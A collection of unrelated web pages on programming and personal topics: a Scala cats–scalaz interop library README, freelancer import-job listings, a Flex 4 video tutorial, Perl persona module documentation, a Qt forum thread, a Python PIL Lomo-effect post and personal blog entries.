Shims aims to provide a convenient, bidirectional, and transparent set of conversions between scalaz and cats, covering typeclasses (e.g. Monad) and data types (e.g. \/). By that I mean, with shims, anything that has a cats.Functor instance also has a scalaz.Functor instance, and vice versa. Additionally, every convertible scalaz datatype – such as scalaz.State – has an implicitly-added asCats function, while every convertible cats datatype – such as cats.free.Free – has an implicitly-added asScalaz function.

Only a single import is required to enable any and all functionality:

    import shims._

Toss that at the top of any files which need to work with APIs written in terms of both frameworks, and everything should behave seamlessly. You can see some examples of this in the test suite, where we run the cats laws-based property tests on scalaz instances of various typeclasses.

Usage

Add the following to your SBT configuration:

    libraryDependencies += "com.codecommit" %% "shims" % "<version>"

If you're using scala.js, use %%% instead. Cross-builds are available for Scala 2.11, 2.12, and 2.13. It is strongly recommended that you enable the relevant SI-2712 fix in your build if using 2.11 or 2.12. Details here. A large number of conversions will simply not work without partial unification.

Note that shims generally follows epoch.major.minor versioning schemes, meaning that changes in the second component may be breaking. This is mostly because maintaining strict semver with shims would be immensely difficult due to the way the conversions interact. Shims is more of a leaf-level project, anyway, so semantic versioning is somewhat less critical here. Feel free to open an issue and make your case if you disagree, though.

Once you have the dependency installed, simply add the following import to any scopes which require cats-scalaz interop:

    import shims._

That's it!
Effect Types

You can also use shims to bridge the gap between the older scalaz Task hierarchy and newer frameworks which assume cats-effect typeclasses and similar:

    libraryDependencies += "com.codecommit" %% "shims-effect" % "<version>"

    import shims.effect._

For more information, see the shims-effect subproject readme.

Upstream Dependencies

- cats 2.0.0
- scalaz 7.2.28

At present, there is no complex build matrix of craziness to provide support for other major versions of each library. This will probably come in time, when I've become sad and jaded, and possibly when I have received a pull request for it.

Quick Example

In this example, we build a data structure using both scalaz's IList and cats' Eval, and then we use the cats Traverse implicit syntax, which necessitates performing multiple transparent conversions. Then, at the end, we convert the cats Eval into a scalaz Trampoline using the explicit asScalaz converter.

    import shims._

    import cats.Eval
    import cats.syntax.traverse._

    import scalaz.{IList, Trampoline}

    val example: IList[Eval[Int]] = IList(Eval.now(1), Eval.now(2), Eval.now(3))
    val sequenced: Eval[IList[Int]] = example.sequence
    val converted: Trampoline[IList[Int]] = sequenced.asScalaz

Conversions

Typeclasses

Typeclass conversions are transparent, meaning that they will materialize fully implicitly without any syntactic interaction. Effectively, this means that all cats monads are scalaz monads and vice versa. What follows is an alphabetized list (in terms of cats types) of typeclasses which are bidirectionally converted. In all cases except where noted, the conversion is exactly as trivial as it seems.

- Alternative
  - Note that MonadPlus doesn't exist in Cats. I'm not sure if this is an oversight. At present, no conversions are attempted, even when Alternative and FlatMap are present for a given F[_]. Change my mind.
- Applicative
- Apply
- Arrow
- ArrowChoice
  - Requires a Bifunctor[F] in addition to a Choice[F]. This is because scalaz produces a A \/ B, while cats produces an Either[A, B].
- Bifoldable
- Bifunctor
- Bitraverse
- Category
- Choice
- CoflatMap
- Comonad
- Compose
- Contravariant
- Distributive
- Eq
- FlatMap
  - Requires Bind[F] and either BindRec[F] or Applicative[F]. This is because the cats equivalent of scalaz.Bind is actually scalaz.BindRec. If an instance of BindRec is visible, it will be used to implement the tailRecM function. Otherwise, a stack-unsafe tailRecM will be implemented in terms of flatMap and point.
  - The cats → scalaz conversion materializes scalaz.BindRec; there is no conversion which just materializes Bind.
- Foldable
- Functor
- InjectK
  - This conversion is weird, because we can materialize a cats.InjectK given a scalaz.Inject, but we cannot go in the other direction because scalaz.Inject is sealed.
- Invariant (functor)
- Monad
  - Requires Monad[F] and optionally BindRec[F]. Similar to FlatMap, this is because cats.Monad constrains F to define a tailRecM function, which may or may not be available on an arbitrary scalaz.Monad. If BindRec[F] is available, it will be used to implement tailRecM. Otherwise, a stack-unsafe tailRecM will be implemented in terms of flatMap and point.
  - The cats → scalaz conversion materializes scalaz.Monad[F] with scalaz.BindRec[F], reflecting the fact that cats provides a tailRecM.
- MonadError
  - Similar requirements to Monad
- Monoid
- MonoidK
- Order
- Profunctor
- Representable
- Semigroup
- SemigroupK
- Show
- Strong
- Traverse

Note that some typeclasses exist in one framework but not in the other (e.g. Group in cats, or Split in scalaz). In these cases, no conversion is attempted, though practical conversion may be achieved through more specific instances (e.g. Arrow is a subtype of Split, and Arrow will convert). And don't get me started on the whole Bind vs BindRec mess. I make no excuses for that conversion.
Just trying to make things work as reasonably as possible, given the constraints of the upstream frameworks. Let me know if I missed anything! Comprehensive lists of typeclasses in either framework are hard to come by.

### Datatypes

Datatype conversions are explicit, meaning that users must insert syntax which triggers the conversion. In other words, there is no implicit coercion between data types: a method call is required. For example, converting between `scalaz.Free` and `cats.free.Free` is done via the following:

```scala
val f1: scalaz.Free[F, A] = ???

val f2: cats.free.Free[F, A] = f1.asCats
val f3: scalaz.Free[F, A] = f2.asScalaz
```

Note that the `asScalaz`/`asCats` mechanism is open and extensible. To enable support for converting some "cats type" `A` to an equivalent "scalaz type" `B`, define an implicit instance of type `shims.conversions.AsScalaz[A, B]`. Similarly, for some "scalaz type" `A` to an equivalent "cats type" `B`, define an implicit instance of type `shims.conversions.AsCats[A, B]`. Thus, a pair of types, `A` and `B`, for which a bijection exists would have a single implicit instance extending `AsScalaz[A, B] with AsCats[B, A]` (though the machinery does not require this is handled with a single instance; the ambiguity resolution here is pretty straightforward).

Wherever extra constraints are required (e.g. the various `StateT` conversions require a `Monad[F]`), the converters require the cats variant of the constraint. This should be invisible under normal circumstances since shims itself will materialize the other variant if one is available.

### Nesting

At present, the `asScalaz`/`asCats` mechanism does not recursively convert nested structures. This situation most commonly occurs with monad transformer stacks. For example:

```scala
val stuff: EitherT[OptionT[Foo, ?], Errs, Int] = ???
stuff.asCats
```

The type of the final line is `cats.data.EitherT[scalaz.OptionT[Foo, ?], Errs, Int]`, whereas you might expect that it would be `cats.data.EitherT[cats.data.OptionT[Foo, ?], Errs, Int]`.
It is technically possible to apply conversions in depth, though it requires some extra functor constraints in places. The primary reason why this isn't done (now) is compile-time performance, which would be adversely affected by the non-trivial inductive solution space. It shouldn't be too much of a hindrance in any case, since the typeclass instances for the nested type will be materialized for both scalaz and cats, and so it doesn't matter as much exactly which nominal structure is in use. It would really only matter if you had a function which explicitly expected one thing or another.

The only exception to this rule is `ValidationNel` in scalaz and `ValidatedNel` in cats. Converting this composite type is a very common use case, and thus a specialized converter is defined:

```scala
val v: ValidationNel[Errs, Int] = ???
v.asCats   // => v2: ValidatedNel[Errs, Int]
```

Note that the `scalaz.NonEmptyList` within the `Validation` was converted to a `cats.data.NonEmptyList` within the resulting `Validated`. In other words, under normal circumstances you will need to manually map nested structures in order to deeply convert them, but `ValidationNel`/`ValidatedNel` will Just Work™ without any explicit induction.

## Contributors

None of this would have been possible without some really invaluable assistance:

- Guillaume Martres (@smarter), who provided the key insight into the scalac bug which was preventing the implementation of `Capture` (and thus, bidirectional conversions)
- Christopher Davenport (@ChristopherDavenport), who contributed the bulk of shims-effect in its original form on scalaz-task-effect
https://index.scala-lang.org/djspiewak/shims/shims/1.3.0?target=_2.11
Import invoices excel jobs

- I have a couple of websites whose product database I would like to import as-is; kindly visit [login to view URL] [login to view URL] ..
- ... Invoices automatically sent to the customer if an order comes in on the marketplace. Customer data must be imported into Prestashop.
- I am looking for somebody who can set up the old website, export products (3000) and categories from it, and reimport them into a Magento 2 environment. My budget is around $110.
- ...sections to this project: Section 1: Admin section; Section 2: Client side. Section 1, Admin: once logged in there needs to be the following menu: Import Current Month || Archive Import || Suppliers. IMPORT CURRENT MONTH: here we will have an upload field where the CSV file will be selected, and the date range of the CSV file must also be set here from
- My client has a business with both normal and online stores. He needs the stock in the online store to be automatically updated from a CSV file that will be placed on a server periodically. This job requires choosing the best Prestashop 1.6 module for this task and configuring it. Placing the CSV file on the server will be done by the client itself, so that part must not be included in the budget...
- Convert Magento product export CSV format to Shopify product import CSV, around 6000 products!!
- I have an e-commerce website and I want to import 30000 products from Taobao to my website with English translation and currency in BDT. I need someone who is already experienced in this job) In
- We are looking for overseas partner(s) for international trading. We also intend to set up an IT and Civil Engineering department, for which we shall be needing overseas partners to outsource their work to us.
- I would like a script that imports products from an external site into a WordPress + WooCommerce site. ...
- Software developed in CorePHP - QR codes integration
- We need a module for integrating Dolibarr with WHMCS, for exchanging invoices, payments etc.
- Import data into software on the cloud. Freelancers with proper written English skill only. We already uploaded our products from OBERLO, now we need someone to...
- Import data into software on the cloud
- I need a software developer for small help, who can modify and add an import option on the add-member section. If you can, let's discuss. Import by CSV file or any
- I have a problem importing XML data. So if you have good experience with the All Import plugin and the Calendarize It! plugin, apply now. You will work via TeamViewer on my computer. Happy bidding.
- Hi there.. We need someone to send us a compiled list of export/import data websites for major countries across the world. ONLY people who are already familiar with finding export/import data for various countries should apply. Thanks!
- Firebase Analytics import dependencies issue. Please bid only if you can work through TeamViewer.
- Update website and integrate booking system with QuickBooks and automated invoices.
- Hi, I need to export and import products from my test site to my new site, including: 1. YIKES, Inc - Custom Product Tabs for WooCommerce; 2. WooCommerce - WooCommerce Product Add-ons; 3. Joomunited - WP Media Folder with all media and folders. The site is in Hebrew and the work must be done ONLY!!! with TeamViewer; bid ONLY if you want to work with TeamViewer.
- Hello, I have a script that downloads pages that I'd like to improve. Would like it to have fields like title, description and price. Let me know if I can provide more information. Thanks.
- I am looking to develop a platform that would allow me to
- Hi, I have a file and need to sort out subcategories in a CSV file. - only people with experience importing via CSV .. which will generate the quote ..
- Hi, I have installed the Warehouse theme with mega menu and I use Total Import Pro. The problem is that the tree doesn't work. Need someone to help me with the categories tree setup to display correctly.
- Freelancer for the distribution of automotive spare parts.
- Interface for Prestashop 1.7.3 data import. See attachments. .. Invoicing suppliers, office administration, purchasing manager.
- Prestashop 1.7.3 categories tree import. A sample of the data I have is in the attachment. Categories must be like Make - Model - Motor - KW - Year. I have 4,000 XML files (UTF-8). I want to have them in TSV (CSV). Thanks.
https://www.freelancer.com/work/import-invoices-excel/
Intro

We knew from the start in writing Professional Papervision that the technology would change mid-stream. Mid-stream is here and we are delighted with the changes. And we are incorporating them into your book. Yes, expect the book to cover Gumbo (Flex 4) – and much more. I just couldn’t resist this graphic below. Is it a bird (gumby)? Is it a plane (dumbo)? No, it’s Gumbo!

In addition to the power of the Flash 10 player, having the open source Gumbo code opens up a whole new world of development possibilities. In this tutorial, you’ll learn how to get started with Gumbo by doing the following:

- Installing and configuring Gumbo
- Creating your first program
- Examining the Gumbo classes

I’m thrilled that Gumbo is here and have already started using it to extend the possibilities of Papervision. You’ll hear much about integrating Gumbo with Papervision in future blog posts.

Gumbo Rotating Video Example

A great place to go for Gumbo examples is Peter deHaan’s blog on Flex Examples. I’ve been reading his blog since it first came out and he does really good work in Flex – almost an example every day. I modified his rotating image Gumbo code and extended it to play video, and have added a discussion on how to discover what is available in Gumbo, and how to work with Gumbo’s class structure. My extended example can be accessed by clicking on the link below – remember you need the Flash 10 player to run it!

You can watch the demo or download the source from the links below:

Demo:
Source:

The Big Deal!!!

So what’s the big deal? Why should you even care about Gumbo? Besides the performance enhancement and ease of use, Flex’s components are now native 3D – no more bitmapdata hacks to get them into Papervision – and if you are interested in building a Flash version of Second Life you just got a major boost. Second Life doesn’t handle data well – Flex 4 is a 3D data animal.
Installing and configuring Gumbo

YouTube (Part 1 Installing Gumbo – Part 2 below):

Getting Started Steps (Covered in YouTube Video)

All these steps are covered in the YouTube video, and they are included here so you can follow along.

1. To download Gumbo, navigate to the following URL:
2. Download the latest stable build or latest milestone – newest date. Download Adobe Flex SDK.
3. Save the latest stable build to your hard drive and extract the files from the .ZIP file.
4. In Flex Builder 3, select Window > Preferences from the main menu to open the Flex Builder Preferences dialog box. To add, edit, or remove a Flex SDK, select Flex > Installed Flex SDKs.
5. Click the Add button to launch the Add Flex SDK dialog box and click the Browse button to navigate to the directory where you extracted the nightly SDK build in a previous step.
6. Click OK to apply your changes and add the new Flex SDK. If you want to set the newly downloaded SDK as your default SDK, click the check box to the left of the SDK name. Click OK to dismiss this dialog.

If you want to compile your code against this new SDK you can select Project > Properties from the main menu, select Flex Compiler from the menu on the left, and select your new SDK from the dropdown menu in the Flex SDK version section.

Note: Make sure Flash Player 10 is selected.

Also worth mentioning is that you can manage your installed SDKs via the Project Properties dialog menu by clicking the Configure Flex SDKs link, which takes you to the Installed Flex SDKs preferences.

Difference Between Builds

- Latest Milestone Release Builds – Releases are builds that have been declared major releases by the development team. Releases are the right builds for people who want to be on a stable, tested release, and don’t need the latest greatest features and improvements.
- Stable Builds – Stable builds have been found to be stable enough for most people to use. They are promoted from nightly builds by the architecture team after they have been used for a few days and deemed reasonable. The latest stable build is the right build for people who want to stay up to date with what is going on in the latest development stream, and don’t mind putting up with a few problems in order to get the latest and greatest features and bug fixes.
- Nightly Builds – Nightly builds are produced every night from whatever has been released into the HEAD of the SVN repository. They are untested and may have problems. Some possibly will not work at all.

Different types of Flex SDKs available:

- Free Adobe Flex SDK – An official Adobe product, with released versions found at. The Adobe Flex SDK contains everything you will need to build and deploy Flex RIAs.
- Open Source Flex SDK – For users who want a package that contains only open source code, we offer the Open Source Flex SDK, which is available from this site.
- Adobe Add-ons for Open Source Flex SDK – This package contains all of the items that are in the Adobe Flex SDK and not in the Open Source Flex SDK.

Code Creation and Working with Classes (Covered in YouTube Video)

YouTube Video (Part 2 Code Creation)

After downloading deHaan’s example of the rotating image, load it into Flex and get it working. You’ll modify his code to get a button-controlled video (play, stop, pause) instead of a rotating image.
Here are the steps below:

1. Add the VideoDisplay import statement:

```actionscript
import mx.controls.VideoDisplay;
```

2. Add a video1 private variable for your video:

```actionscript
private var video1:VideoDisplay;
```

3. Add video play, stop, and pause buttons and include their event listeners in the initialization function:

```actionscript
fxVideoPlay = new FxButton();
fxVideoPlay.label = "Play Video";
fxVideoPlay.addEventListener(MouseEvent.CLICK, playVideo);

fxVideoPause = new FxButton();
fxVideoPause.label = "Pause Video";
fxVideoPause.addEventListener(MouseEvent.CLICK, pauseVideo);

fxVideoStop = new FxButton();
fxVideoStop.label = "Stop Video";
fxVideoStop.addEventListener(MouseEvent.CLICK, stopVideo);
```

4. Add the buttons to the VGroup:

```actionscript
vGroup.addItem(fxVideoPlay);
vGroup.addItem(fxVideoPause);
vGroup.addItem(fxVideoStop);
```

5. Instantiate the VideoDisplay, set its source, position, and style, and add it to the stage:

```actionscript
video1 = new VideoDisplay();
video1.source = "assets/abc7listens.flv";
video1.width = 320;
video1.height = 240;
video1.autoPlay = true;
video1.setStyle("horizontalCenter", 0);
video1.setStyle("verticalCenter", 0);
addItem(video1);
```

6. Finally, add the play, pause, and stop functions for your listeners:

```actionscript
private function playVideo(evt:MouseEvent):void {
    video1.play();
}
private function pauseVideo(evt:MouseEvent):void {
    video1.pause();
}
private function stopVideo(evt:MouseEvent):void {
    video1.stop();
}
```

7. And that's it! To see the code click the more button below. Read the rest of this entry »
https://professionalpapervision.wordpress.com/2008/11/
persona - control which code will be loaded for an execution context

```
$ PERSONA=cron perl foo.pl
```

foo.pl:

```perl
use persona only_for => '*'; # all modules, maybe regex

use Foo;
```

Foo.pm:

```perl
package Foo;

# code to be compiled always

#PERSONA cron || app || book
# code to be compiled only for the "cron", "app" and "book" personas

#PERSONA
# code to be compiled always

#PERSONA !cron
# code to be compiled for all personas except "cron"

#PERSONA !( app || book )
# code to be compiled for all personas except "app" and "book"

my $limit = PERSONA eq 'app' ? 100 : 10; # code using the constant
```

This documentation describes version 0.12.

This module was born out of the need to be able to easily specify which subroutines of a module should be available (as in "compiled") in different sets of mod_perl environments (e.g. the visitors' front-end web servers, or the personnel's back-office web servers). This matters both from a memory, database and CPU usage point of view, as well as from the viewpoint of security.

This is most useful when using a database abstraction layer such as Class::DBI or DBIx::Class, where all of the code pertaining to an object is located in one file, while only parts of the code are actually needed (or wanted) in specific execution contexts.

By specifying an environment variable, by default PERSONA, it is possible to indicate the persona for which the source code should be compiled. Any modules that are indicated to support persona dependent code will then be checked for the existence of persona conditional markers, and any code that is after a persona marker that does not match the currently selected persona will be discarded during compilation.

Most likely, not all modules that you load need to be checked for persona specific code. Therefore you must indicate which modules you want this check to be performed for.
This can be done with the only_for parameter when loading the persona module:

```perl
use persona only_for => 'Foo';
```

will check all files that start with Foo, such as:

```
Foo.pm
FooBar.pm
Foo/Bar.pm
```

but not:

```
Bar.pm
```

You can also specify a regular expression that way:

```perl
use persona only_for => qr/^(?:Foo|Bar)\.pm$/;
```

will only check the Foo.pm and Bar.pm files.

Usually the modules of a certain context that you want checked share a common prefix. It is then usually easier to specify the setting on the command line:

```
$ PERSONA=cron perl -Mpersona=only_for,Foo script.pl
```

would execute the script script.pl for the persona cron and have all modules that start with Foo checked for persona dependent code. Only code that is to be included for all personas, or specifically for the cron persona, will be compiled.

Suppose we want to have a method override_access available only for the backoffice persona. This can be done this way:

```perl
#PERSONA backoffice
sub override_access {
    # only for the back office persona
    # code...
}

#PERSONA
sub has_access {
    # for all personas
    # code...
}
```

It is also possible to have code compiled for all personas except a specific one:

```perl
#PERSONA !cron
sub not_for_cron {
    # code...
}

#PERSONA
```

would make the subroutine not_for_cron available for all personas except cron.

It is also possible to have code compiled for a set of personas:

```perl
#PERSONA cron || backoffice
sub for_cron_and_backoffice {
    # code...
}

#PERSONA
```

would make the subroutine for_cron_and_backoffice available for the personas cron and backoffice.

Or it is possible to have code compiled for all personas except for a set of personas:

```perl
#PERSONA !( app || book )
sub not_for_app_or_book {
    # code...
}
```

would make the subroutine not_for_app_or_book available for all personas except app and book.

Basically any valid expression consisting of \w \s ( ) ! || is allowed: if that expression yields a true value, then that code will be compiled.
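To make the marker semantics above concrete, here is a small illustrative sketch, written in Python rather than Perl purely for illustration, of how lines between #PERSONA markers could be kept or dropped for a given persona. The function name and the eval-based handling of the marker expression are my own inventions for this sketch, not the module's actual implementation (a real implementation would parse the expression properly rather than use eval).

```python
import re

def filter_for_persona(source, persona):
    """Keep only lines whose active #PERSONA expression matches `persona`."""
    keep = True        # before any marker is seen, code is for all personas
    out = []
    for line in source.splitlines():
        m = re.match(r'#PERSONA\s*(.*)$', line.strip())
        if m:
            expr = m.group(1).strip()
            if not expr:
                keep = True        # bare marker: back to "all personas"
            else:
                # Turn e.g. "!( app || book )" into a Python boolean
                # expression over the current persona name, then evaluate.
                py = re.sub(r'\w+', lambda w: str(w.group(0) == persona), expr)
                py = py.replace('||', ' or ').replace('!', ' not ')
                keep = eval(py)    # fine for a sketch; don't do this for real
            continue
        if keep:
            out.append(line)
    return "\n".join(out)

src = """always()
#PERSONA cron || app
cron_or_app()
#PERSONA
also_always()
#PERSONA !cron
not_cron()
"""
print(filter_for_persona(src, "cron"))
```

Running the sketch with persona "cron" keeps the unconditional lines and the `cron || app` block, while dropping the `!cron` block, mirroring the marker rules described above.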
If you're lazy, and you don't care about any overhead while compiling code, you can indicate that you want all modules checked for PERSONA specific code by specifying '*' as the indication of which files should be checked:

```perl
use persona only_for => '*';
```

If you want to specify multiple conditions, you can specify only_for more than once:

```perl
use persona
  only_for => 'Foo',
  only_for => 'Bar';
```

To facilitate more complex persona dependencies, all namespaces seen by this module automatically have the constant PERSONA imported into them. This allows the constant to be used in actual code (which will then be optimized away by the Perl compiler, so that the code that shouldn't be compiled for that persona really isn't available for execution in the end).

If you want to make sure that the use of the PERSONA constant in a file will not break code when using strict (which you should!), you can add:

```perl
use strict;
use persona;  # compilation error without this

print "Running code for persona " . PERSONA . "\n" if PERSONA;
```

in that file. That will export the PERSONA constant, even when it is not set.

Another example from Class::DBI / DBIx::Class:

```perl
__PACKAGE__->columns( All => ( PERSONA eq 'backoffice' ? @all : @subset ) );
```

which will only use all columns when executing as the backoffice persona. Otherwise only a subset of columns will be available.

In order to easily support operating systems that have shells that do not support easy setting of environment variables on the command line, you can also specify the persona from the command line while loading this module:

```
$ perl -Mpersona=cron bar.pl
```

will set the persona to "cron". This can also be combined with other parameters, such as:

```
$ perl -Mpersona=only_for,*,persona,cron bar.pl
```

which would process all files loaded for the cron persona. Alternately, the same is possible in source:

```perl
use persona 'cron';
```

would select the cron persona, but only if no other persona was selected before.

The test-suite contains some examples.
More to be added as time permits.

When the import class method of persona is first called, it looks at whether an ENV_PERSONA environment variable is specified. If it is, its value is used as the name of the environment variable to check for the value to be assigned to the persona. If the ENV_PERSONA environment variable is not found, PERSONA will be assumed for the name to check.

If there is a non-empty persona value specified, then an @INC handler is installed. This handler is offered each file that is required or used from that moment onward. If it is not a file that should be checked for persona conditional code, it is given back to the normal require handling.

If the import method determines it is being called from a script that is being called from the command line, it will do the script and then exit. This causes the script itself to be called with require, and thus be handled by the @INC handler we installed.

If it is a file that should be checked, it is searched for in the @INC array. If found, it is opened and all the lines that should be part of the code for the current persona are added to an in-memory buffer. Then a memory file handle is opened on that buffer and returned for normal require handling.

To make sure that any errors or stack traces show the right line numbers, appropriate #line directives are added to the source being offered to the perl compilation process.

Please do:

```
perldoc -f require
```

for more information about @INC handlers.

Some class methods are provided as building bricks for more advanced usage of the persona functionality.

```perl
my $source_ref = persona->path2source($path);                           # current persona
my ( $source_ref, $skipped ) = persona->path2source( $path, $persona );
```

Process the file given by the absolute path name for the given persona. Assume the current process' persona if none given. Returns a reference to the scalar containing the processed source, or undef if the file could not be opened.
Optionally also returns the number of lines in the original source that were skipped. This functionality is specifically handy for deployment procedures where source files are pre-processed for execution in their intended context, rather than doing this at compilation time each time. This removes the need for having this module installed in production environments and reduces possible problems with wrong persona settings in an execution context.

(none)

If you want to find out how this module is appreciated by other people, please check out this module's rating at (if there are any ratings for this module). If you like this module, or otherwise would like to have your opinion known, you can add your rating of this module at.

Inspired by the function of the load and ifdef modules from the same author. And thanks to the pressure (perhaps unknowingly) exerted by the Amsterdam Perl Mongers.

Please note that if any lines were removed from the source, the path name in %INC will be postfixed with the string:

```
(skipped %d lines for persona '%s')
```

where the %d will be filled with the number of lines skipped, and the %s will be filled with the persona for which the lines were removed. Also note that the __FILE__ compiler constant will not have this information postfixed, as that is more or less expected to just contain a path at all times.

Elizabeth Mattijsen, <liz@dijkmat.nl>. Please report bugs to <perlbugs@dijkmat.nl>.

Developed for the mod_perl environment at Booking.com.

Copyright (c) 2009, 2012 Elizabeth Mattijsen <liz@dijkmat.nl>. All rights reserved. This program is free software; you can redistribute it and/or modify it under the same terms as Perl itself.
http://search.cpan.org/~elizabeth/persona-0.12/lib/persona.pm
Why are there two Qt Quick Controls namespaces (1.4 and 2.3) and is it okay to use both?

I'm currently learning Qt (coming from the C# and WPF worlds). I was looking for a TreeView and I couldn't find it in the Design tab; then by looking at its documentation it appears that `import QtQuick.Controls 1.4` is necessary instead of the `import QtQuick.Controls 2.3` found when you create a new "Qt Quick Application - Empty" project. I then realized that in fact you can import both namespaces and indeed have the best of both worlds.

My question is twofold: Is this something okay to do and are there any caveats in doing so? Additionally, are the controls in 1.4 in the long term going to end up in 2.3? i.e. why are there two namespaces with different versions and controls? (a link to relevant documentation would be appreciated)

Thank you.

- SGaist (Lifetime Qt Champion): Hi and welcome to devnet. The modules have two different versions because they are built on top of two different technologies. You can mix them but usually use the V2 version. AFAIK, the long term plan is to obsolete V1 and completely replace it with V2.

- Thank you, alright!
https://forum.qt.io/topic/102740/why-are-there-two-qt-quick-controls-namespaces-1-4-and-2-3-and-is-it-okay-to-use-both
Something for python programmers and photographers alike… In the comments of my last post Emmet Connolly pointed me in the direction of PIL – Python’s answer to PerlMagick. I’m just kicking the tyres on PIL at the moment but the signs are promising. To test PIL’s abilities I decided to see if I could programmatically Lomoize photos using PIL. I think the process of adding a Lomo effect to a photo is interesting enough that it warrants some deconstruction.

Let’s start with the original image – a nice autumnal photo taken just a few weeks ago in Fota Gardens, Cork… Adding a Lomo effect will create a darkened vignette-like shadow around the photo and saturate the colors a little, creating a warm ‘artsy’ feel… This new Lomo-fied version is constructed from 3 distinct layers…

- A saturated lower layer
- A darkened upper layer
- A “mask” which will be used when superimposing the 2 layers

First I create a saturated lower layer… then a darkened upper layer… Next comes the hard part: the mask which will be used when overlaying the saturated and darker images. Masks are (as their name implies) special layers which let you specify what parts of the lower image show through when sticking another image on top of it. For a Lomo effect, I use a fuzzy circular mask so that the center of the lower image is visible. I start by using a basic 256 pixel square image… then stretch it to match the photo along its longest side… then crop it so that its size matches that of the photo… Compositing the saturated and darkened images using the above mask results in the following Lomo-effect photo…

Now all of this is pretty easy if you’re a power Photoshop or GIMP user. Most power users are familiar with the common photo-editing concepts of layers, channels and alpha masks etc. The tricky part (and I’m not trying to blow my own trumpet here) is committing and codifying that knowledge in cold hard source code.
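As an aside, the fuzzy circular mask can also be generated programmatically rather than loaded from a pre-made file. The sketch below is my own illustration: the article uses a ready-made mask256x256.jpg, and I'm only assuming it is roughly a radial white-to-black gradient. It computes the gradient in plain Python (as a grid of 0-255 values) and shows in comments how the result could be handed to PIL.

```python
def make_vignette_mask(size=256):
    """Return a size x size grid of 0-255 values: bright centre, dark corners."""
    cx = cy = (size - 1) / 2.0
    max_dist = (cx * cx + cy * cy) ** 0.5   # distance from centre to a corner
    mask = []
    for y in range(size):
        row = []
        for x in range(size):
            dist = ((x - cx) ** 2 + (y - cy) ** 2) ** 0.5
            # 255 (white) at the centre, fading to 0 (black) at the corners
            row.append(max(0, int(255 * (1.0 - dist / max_dist))))
        mask.append(row)
    return mask

mask = make_vignette_mask(256)
# To use it with PIL, flatten it into an "L"-mode image, e.g.:
#   img = Image.new("L", (256, 256))
#   img.putdata([v for row in mask for v in row])
#   img.save("mask256x256.jpg", "JPEG")
```

A linear radial falloff like this gives a fairly gentle vignette; squaring the falloff term would darken the corners more aggressively if that looks closer to the real Lomo effect.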
A lot of Pixenate’s operations involve compositing of one kind or another, so compositing, and general mucking about with alpha channels and masks, is a good litmus test for any image library’s abilities. So far, Python’s PIL is scoring pretty well – at least as good as Perl’s PerlMagick. To paraphrase Jennifer Aniston – “here’s the source part” (it’s my first publicly-posted Python code so please be gentle :-) )…

```python
from PIL import Image
from PIL import ImageEnhance
from PIL import ImageColor

def lomoize (image, darkness, saturation):
    """
    Add a 'Lomo' effect to an image.

    This is achieved by compositing two versions of the image on top of
    each other using a vignette mask so that the image appears bright and
    saturated in the middle, but darker in the corners.

    a. Saturate the lower layer
    b. Darken the upper layer
    c. Overlay the two layers using a special "Vignette" mask.

    @param image       The image to be lomoized
    @param darkness    0 - 1.0 How much darker the upper layer will be
                       (0 = black, 1.0 = original)
    @param saturation  How much more saturated the lower layer will be
                       (1.0 = no change, higher = more saturated)
    @return lomoized image
    """
    #
    # Get the image size
    #
    (width, height) = image.size

    #
    # resize the mask appropriately
    #
    max = width
    if height > width:
        max = height
    mask = Image.open("d:/home/mask256x256.jpg").resize((max, max))

    #
    # crop the mask to match the image size
    #
    left = (max - width) / 2
    upper = (max - height) / 2
    mask = mask.crop((left, upper, left + width, upper + height))

    #
    # create the darkened upper layer for the corners
    #
    darker = ImageEnhance.Brightness(image).enhance(darkness)

    #
    # create the saturated lower layer for the center
    #
    saturated = ImageEnhance.Color(image).enhance(saturation)

    #
    # Composite the darker upper layer on top of the saturated
    # lower layer using the mask
    #
    lomoized = Image.composite(saturated, darker, mask)
    return lomoized

"""
Main program begins here
"""
kate = Image.open("d:/home/kate.jpg")
lomoized = lomoize(kate, 0.4, 2.5)
lomoized.save("d:/home/lomo.jpg", "JPEG", quality=100)
```

So far I like PIL but I really need to investigate how difficult it will be to deploy a PIL-based solution.

Comments:

Emmet: Nice work, Walter – you don’t waste any time, do you?! I’m the last person in the world to be picking apart someone else’s code, but since you asked, could the image resize section be changed to

```python
max = width
min = height
if height > width:
    max = height
    min = width
mask = Image.open("d:/home/mask256x256.jpg").resize((max, min))
```

and then leave out the cropping part? Seems to me that this would mean you would have a little bit of that lovely vignetting at the top and bottom of the image too.

Emmet: Oops, sorry about that, looks like the pre tags got stripped. Python doesn’t look quite the same without indentation, does it? :)

Walter: Hi Emmet, I need to resize the vignette to the largest dimension – then crop so that I get a cut-off vignette. If I resize but don’t crop then the vignette is oval-shaped. Oval masks aren’t bad but I think a circular mask for Lomo is more authentic.
https://sxoop.wordpress.com/2006/11/30/lomo-deconstructed/
Over the weekend Stevens Pass and the Cascade mountains received several inches of fresh powder. It's been almost a month since I've been on my snowboard and I couldn't resist any longer. This morning I headed up to Stevens and spent a few hours listening to tunes on my Zune while riding Hog Heaven, Rock 'N Blue, Hog Wild, Skyline, Barrier Ridge and Marmot Meadows. What an awesome morning!

~tod

tags: snowboarding, stevens+pass

No, I'm not talking about that errant piece of gum in the parking lot that always seems to end up on my shoe. Or the leftover snacks that always seem to surround your child's mouth for hours after the actual meal. I'm talking about The Stickiness Factor as described by Malcolm Gladwell in The Tipping Point.

I'm in the middle of the book right now, but Gladwell's discussion of The Stickiness Factor (chapter 3) revolves around two insanely popular children's shows, the iconic Sesame Street and new kid on the block Blue's Clues. As the father of a 3 year old, I found it particularly interesting from the perspective of how children learn.

First of all, let's make sure we're on the same page. The Stickiness Factor is just how well someone remembers an idea...how well it sticks. Be it a salesman's pitch for a vacuum cleaner, an algorithm from a software engineering textbook or a TV commercial for Dove's Real Beauty campaign. When looking at small children (ages 2-7) the stickiness factor Gladwell refers to revolves around learning and the children's ability to retain what we're trying to teach them, via TV in these instances.

Here's what he discusses with regard to Sesame Street:

After all that, what else could there be? Well, Blue's Clues applied the lessons from the well-deserved success of Sesame Street and added a few more of their own:

I took the liberty of paraphrasing several portions of the chapter and noted the pages where appropriate. My thoughts on this?
Well, I just found it very interesting to see how they performed the research for the shows and the results. Everything my daughter does corroborates their findings as well. She loves Dora the Explorer, "Go, Diego, Go" and the Little Einsteins, which seem to use the same methodology as Blue's Clues [a 20 minute story at a slow pace with the characters taking long pauses after interacting with the viewers]. Not only does she love the shows, but she really does learn from them. One day about 6 months ago, completely out of the blue, she counted to 10 in Spanish! I know for a fact she learned that from Dora.

